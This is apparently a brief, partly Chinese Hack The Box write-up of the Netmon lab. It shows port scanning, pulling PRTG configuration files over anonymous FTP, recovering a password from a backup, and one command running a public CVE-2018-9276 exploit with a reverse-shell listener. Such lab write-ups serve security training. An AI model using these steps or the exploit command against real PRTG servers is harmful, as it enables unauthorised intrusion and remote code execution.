• URL : https://app.hackthebox.eu/machines/Netmon
• IP : 10.129.210.193

Recon

• Rustscan

  Open 10.129.210.193:21
  Open 10.129.210.193:80
  Open 10.129.210.193:135
  Open 10.129.210.193:139
  Open 10.129.210.193:445
  Open 10.129.210.193:5985
  

• nmap

  • 
  • 

• FTP

  • 
  • 

• Web

  • appVersion':'18.1.37.13946'
  • 
  • https://github.com/wildkindcc/CVE-2018-9276
  • https://github.com/chcx/PRTG-Network-Monitor-RCE

FTP

• 
• 
• Try Exploit
  • https://github.com/chcx/PRTG-Network-Monitor-RCE
  • 
  • 需要登入才能用，所以我們需要找帳密QQ
• 從官網發現 Log 跟 Config 存在 /ProgramData/Paessler
  • wget -r ftp://10.129.210.193/ProgramData/Paessler
  • 整包載下來
• grep password */* | less
  • 發現 PRTG Configuration.dat 很可疑
  • 
• 看到相關的檔案有以下幾個
  • PRTG Configuration.old.bak
  • PRTG Configuration.dat
  • PRTG Configuration.old
  • Configuration Auto-Backups/*
• PRTG Configuration.old.bak 應該最可疑
  • 
  • 看到帳密
    • prtgadmin
    • PrTg@dmin2018
    • 但登入失敗
• 通靈把密碼改 2019
  • prtgadmin
  • PrTg@dmin2019
  • 登入成功
  • 

Exploit

• https://github.com/wildkindcc/CVE-2018-9276
  • python CVE-2018-9276.py -i 10.129.210.202 -p 80 --lhost 10.10.16.35 --lport 7877 --user prtgadmin --password PrTg@dmin2019
  • 
• 確定權限
  • 
• 取得 Flag
  •